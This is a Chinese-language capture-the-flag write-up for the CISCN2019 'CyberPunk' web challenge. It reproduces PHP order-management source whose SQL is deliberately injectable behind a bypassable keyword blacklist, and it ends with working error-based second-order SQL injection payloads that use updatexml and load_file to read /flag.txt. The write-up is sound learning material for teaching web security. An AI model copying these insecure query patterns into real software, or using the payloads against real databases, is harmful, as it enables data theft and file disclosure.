[CISCN2019 华北赛区 Day1 Web5]CyberPunk
进入题目
点击左下角
发现不同文件
查看index.php检查发现
file参数
猜测文件包含用php为协议读取源码
-
require_once "config.php";
-
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
-
{
-
$msg = '';
-
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
-
$user_name = $_POST["user_name"];
-
$phone = $_POST["phone"];
-
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
-
$msg = 'no sql inject!';
-
}else{
-
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
-
$fetch = $db->query($sql);
-
}
-
if (isset($fetch) && $fetch->num_rows>0){
-
$row = $fetch->fetch_assoc();
-
if(!$row) {
-
echo 'error';
-
print_r($db->error);
-
exit;
-
}
-
$msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
-
} else {
-
$msg = "未找到订单!";
-
}
-
}else {
-
$msg = "信息不全";
-
}
-
?>
- <head>
- <title>搜索</title>
- </head>
- <body>
-
-
<div class="container">
-
<div class="row">
-
<div class="col-md-8 col-md-offset-2 centered">
-
<p style="margin:35px 0;"><br></p>
-
<h1>订单查询</h1>
-
<form method="post">
-
<p>
-
<h3>姓名:</h3>
-
<input type="text" class="subscribe-input" name="user_name">
-
<h3>电话:</h3>
-
<input type="text" class="subscribe-input" name="phone">
-
</p>
-
<p>
-
<button class='btn btn-lg btn-sub btn-white' type="submit">查询订单</button>
-
</p>
-
</form>
-
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
-
</div>
-
</div>
-
</div>
-
-
<div class="container">
-
<div class="row">
-
<p style="margin:35px 0;"><br></p>
-
<h2 class="mb">订单管理</h2>
-
<a href="./index.php">
-
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
-
</a>
-
<a href="./change.php">
-
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
-
</a>
-
<a href="./delete.php">
-
<button class="btn btn-lg btn-register btn-white" >我不想要了</button>
-
</a>
-
</div>
-
</div>
- </body>
-
同理可得到其他文件的源码
delete.php
-
require_once "config.php";
-
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
-
{
-
$msg = '';
-
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
-
$user_name = $_POST["user_name"];
-
$phone = $_POST["phone"];
-
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
-
$msg = 'no sql inject!';
-
}else{
-
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
-
$fetch = $db->query($sql);
-
}
-
if (isset($fetch) && $fetch->num_rows>0){
-
$row = $fetch->fetch_assoc();
-
$result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
-
if(!$result) {
-
echo 'error';
-
print_r($db->error);
-
exit;
-
}
-
$msg = "订单删除成功";
-
} else {
-
$msg = "未找到订单!";
-
}
-
}else {
-
$msg = "信息不全";
-
}
-
?>
- <head>
- <title>删除订单</title>
- </head>
- <body>
-
-
<div class="container">
-
<div class="row">
-
<div class="col-md-8 col-md-offset-2 centered">
-
<p style="margin:35px 0;"><br></p>
-
<h1>删除订单</h1>
-
<form method="post">
-
<p>
-
<h3>姓名:</h3>
-
<input type="text" class="subscribe-input" name="user_name">
-
<h3>电话:</h3>
-
<input type="text" class="subscribe-input" name="phone">
-
</p>
-
<p>
-
<button class='btn btn-lg btn-sub btn-white' type="submit">删除订单</button>
-
</p>
-
</form>
-
<?php global $msg; echo '<h2 class="mb" style="color:#ffffff;">'.$msg.'</h2>';?>
-
</div>
-
</div>
-
</div>
-
-
<div class="container">
-
<div class="row">
-
<h2 class="mb">订单管理</h2>
-
<a href="./index.php">
-
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
-
</a>
-
<a href="./search.php">
-
<button class="btn btn-lg btn-register btn-white" >我要查订单</button>
-
</a>
-
<a href="./change.php">
-
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
-
</a>
-
</div>
-
</div>
- </body>
change.php
-
require_once "config.php";
-
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
-
{
-
$msg = '';
-
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
-
$user_name = $_POST["user_name"];
-
$address = addslashes($_POST["address"]);
-
$phone = $_POST["phone"];
-
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
-
$msg = 'no sql inject!';
-
}else{
-
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
-
$fetch = $db->query($sql);
-
}
-
if (isset($fetch) && $fetch->num_rows>0){
-
$row = $fetch->fetch_assoc();
-
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
-
$result = $db->query($sql);
-
if(!$result) {
-
echo 'error';
-
print_r($db->error);
-
exit;
-
}
-
$msg = "订单修改成功";
-
} else {
-
$msg = "未找到订单!";
-
}
-
}else {
-
$msg = "信息不全";
-
}
-
?>
- <head>
- <title>修改收货地址</title>
- </head>
- <body>
-
-
<div class="container">
-
<div class="row">
-
<div class="col-md-8 col-md-offset-2 centered">
-
<p style="margin:35px 0;"><br></p>
-
<h1>修改收货地址</h1>
-
<form method="post">
-
<p>
-
<h3>姓名:</h3>
-
<input type="text" class="subscribe-input" name="user_name">
-
<h3>电话:</h3>
-
<input type="text" class="subscribe-input" name="phone">
-
<h3>地址:</h3>
-
<input type="text" class="subscribe-input" name="address">
-
</p>
-
<p>
-
<button class='btn btn-lg btn-sub btn-white' type="submit">修改订单</button>
-
</p>
-
</form>
-
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
-
</div>
-
</div>
-
</div>
-
-
<div class="container">
-
<div class="row">
-
<p style="margin:35px 0;"><br></p>
-
<h2 class="mb">订单管理</h2>
-
<a href="./index.php">
-
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
-
</a>
-
<a href="./search.php">
-
<button class="btn btn-lg btn-register btn-white" >我要查订单</button>
-
</a>
-
<a href="./delete.php">
-
<button class="btn btn-lg btn-register btn-white" >我不想要了</button>
-
</a>
-
</div>
-
</div>
- </body>
在change.php中发现可利用二次注入,它调用了旧地址
于是sql注入,报错注入
1' and updatexml(1,concat(0x7e,(substr((select group_concat(column_name) from information_schema.columns where table_name='user' and table_schema='ctfusers'),25,30)),0x7e),1)#
通过查表等操做发现数据库中没有flag,猜测在文件/flag.txt中,函数返回最长值有限分两次读取
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),28,50)),0x7e),1)#